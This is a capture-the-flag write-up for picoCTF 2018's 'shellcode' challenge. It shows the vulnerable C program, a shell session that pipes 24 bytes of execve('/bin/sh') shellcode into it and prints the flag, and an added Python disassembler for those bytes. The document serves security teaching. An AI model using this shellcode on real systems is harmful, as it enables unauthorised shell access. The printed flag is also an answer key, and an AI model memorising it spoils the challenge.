picoCTF 2018: shellcode
Problem
Problem statement
This program executes any input you give it. Can you get a shell? You can find the program in /problems/shellcode_2_0caa0f1860741079dd0a66ccf032c5f4 on the shell server. Source.
Hints
Maybe try writing some shellcode?
You also might be able to find some good shellcode online.
Problem summary
Solution
Approach
- Pass shellcode as input
Explanation
The source code of the given program is shown below.
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 148
#define FLAGSIZE 128

void vuln(char *buf){
  gets(buf);
  puts(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);

  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  char buf[BUFSIZE];

  puts("Enter a string!");
  vuln(buf);

  puts("Thanks! Executing now...");

  ((void (*)())buf)();

  return 0;
}
```
The program reads a string and then executes that string directly as machine code.
As the title suggests, it is enough to supply shellcode as input that runs execve("/bin/sh").
I used the shellcode from the page below.
http://inaz2.hatenablog.com/entry/2014/03/13/013056
```
kira924age@pico-2018-shell-2:/problems/shellcode_2_0caa0f1860741079dd0a66ccf032c5f4$ (python -c "print '\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80'"; cat) | ./vuln
Enter a string!
1▒Rh//shh/bin▒▒RS▒▒B ̀
Thanks! Executing now...
ls
flag.txt  vuln  vuln.c
cat flag.txt
picoCTF{shellc0de_w00h00_8b811b44}
```
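To show what the 24 bytes in the session above actually do, here is an added example (not part of the original write-up or of the referenced shellcode post) that decodes them instruction by instruction. The decoder is deliberately limited to the i386 encodings that occur in this byte string, and the function names are chosen for this example.

```python
import struct

# The 24 bytes piped into ./vuln in the session above.
SHELLCODE = bytes.fromhex("31d252682f2f7368682f62696e89e3525389e18d420bcd80")
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def disassemble(code):
    """Decode the few i386 encodings this shellcode uses; reject anything else."""
    out, i = [], 0
    while i < len(code):
        op = code[i]
        modrm = code[i + 1] if i + 1 < len(code) else 0
        mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
        if 0x50 <= op <= 0x57:                     # push r32
            text, size = f"push {REG32[op - 0x50]}", 1
        elif op == 0x68:                           # push imm32 (little-endian)
            imm = struct.unpack_from("<I", code, i + 1)[0]
            text, size = f"push 0x{imm:08x}", 5
        elif op in (0x31, 0x89) and mod == 3:      # xor/mov r/m32, r32 (register form)
            name = "xor" if op == 0x31 else "mov"
            text, size = f"{name} {REG32[rm]}, {REG32[reg]}", 2
        elif op == 0x8D and mod == 1 and rm != 4:  # lea r32, [r32 + disp8]
            disp = struct.unpack_from("b", code, i + 2)[0]
            text, size = f"lea {REG32[reg]}, [{REG32[rm]}{disp:+#x}]", 3
        elif op == 0xCD:                           # int imm8
            text, size = f"int 0x{modrm:02x}", 2
        else:
            raise ValueError(f"unhandled opcode 0x{op:02x} at offset {i}")
        out.append((i, text))
        i += size
    return out


def stack_string(code):
    """Bytes left at esp by the push-imm32 run; the last push is at the lowest address."""
    words = [code[i + 1:i + 5] for i, t in disassemble(code) if t.startswith("push 0x")]
    return b"".join(reversed(words))


if __name__ == "__main__":
    for off, text in disassemble(SHELLCODE):
        print(f"{off:2d}: {text}")
    # eax = 0xb is execve on i386 Linux: ebx -> path, ecx -> argv, edx = NULL envp
    print("path on stack:", stack_string(SHELLCODE))
```

The listing ends with `lea eax, [edx+0xb]` and `int 0x80`, that is, syscall number 11 (execve) with ebx pointing at the `/bin//sh` string built on the stack.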